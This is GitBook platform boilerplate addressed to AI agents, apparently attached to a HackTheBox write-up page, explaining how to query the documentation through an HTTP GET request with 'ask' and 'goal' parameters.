# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-redelegate.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
